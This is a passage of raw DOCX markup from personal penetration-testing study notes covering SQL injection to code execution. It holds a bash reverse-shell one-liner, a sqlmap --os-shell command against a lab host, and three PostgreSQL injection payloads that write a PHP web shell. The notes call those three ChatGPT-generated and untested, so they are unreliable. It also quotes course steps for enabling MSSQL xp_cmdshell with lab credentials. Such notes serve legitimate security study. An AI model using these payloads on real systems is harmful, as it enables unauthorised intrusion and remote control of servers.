        </w:rPr>
        <w:t xml:space="preserve">And their payload was this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i &gt;&amp; /dev/tcp/&lt;IP&gt;/&lt;PORT&gt; 0&gt;&amp;1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="676"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But the weird thing is that you had to access it from the port 3305 webpage and not the port 80 one which was vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId481">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uses sqlmap instead, which is really long, but it gives you root shell. And then you can make it send a rev shell </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="338"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap http://192.168.168.52:8080/zm/index.php --data="view=request&amp;request=log&amp;task=query&amp;limit=100&amp;minTime=5" --os-shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wbwm8wd1v0zi" w:id="196"/>
      <w:bookmarkEnd w:id="196"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading web shell with PostgreSQL (never tested)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from chatGPT and I never tested this so idk if it works.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017D9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No INTO OUTFILE. Use server‑side file I/O that is superuser‑only.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY … TO '/path/file' (superuser)</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ; COPY (SELECT $$&lt;?php echo system($_REQUEST["cmd"]); ?&gt;$$) TO '/var/www/html/cmd.php';--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">COPY … TO PROGRAM to echo out (superuser)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' ; COPY (SELECT $$&lt;?php echo system($_REQUEST["cmd"]); ?&gt;$$) TO PROGRAM 'bash -c "cat &gt; /var/www/html/cmd.php"';--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Untrusted PLs (e.g., plpythonu) (superuser)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'; DO $$ import pathlib; pathlib.Path("/var/www/html/cmd.php").write_text("&lt;?php echo system($_REQUEST[\"cmd\"]); ?&gt;") $$;--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E1">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rgimcc81yo0x" w:id="197"/>
      <w:bookmarkEnd w:id="197"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (10.3.1. Manual Code Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Depending on the underlying database system we are targeting, we need to adapt our strategy to obtain code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In Microsoft SQL Server, the</w:t>
      </w:r>
      <w:hyperlink r:id="rId482">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId483">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">xp_cmdshell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function takes a string and passes it to a command shell for execution. The function returns any output as rows of text. The function is disabled by default and once enabled, it must be called with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword instead of SELECT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In our database, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user already has the appropriate permissions. Let's enable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by simulating an SQL injection via the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-mssqlclient</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E9">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2235200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="500" name="image526.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image526.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId484"/>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17EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE sp_configure 'show advanced options', 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE sp_configure 'xp_cmdshell', 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017EF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After logging in from our Kali VM to the MSSQL instance, we can enable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show advanced options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> by setting its value to 1, then applying the changes to the running configuration via the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement. Next, we'll enable </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and apply the configuration again using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RECONFIGURE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this feature enabled, we can execute any Windows shell command through the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement followed by the feature name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F1">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2095500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="580" name="image557.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image557.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId485"/>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7F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="949"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="600" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE xp_cmdshell 'whoami';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
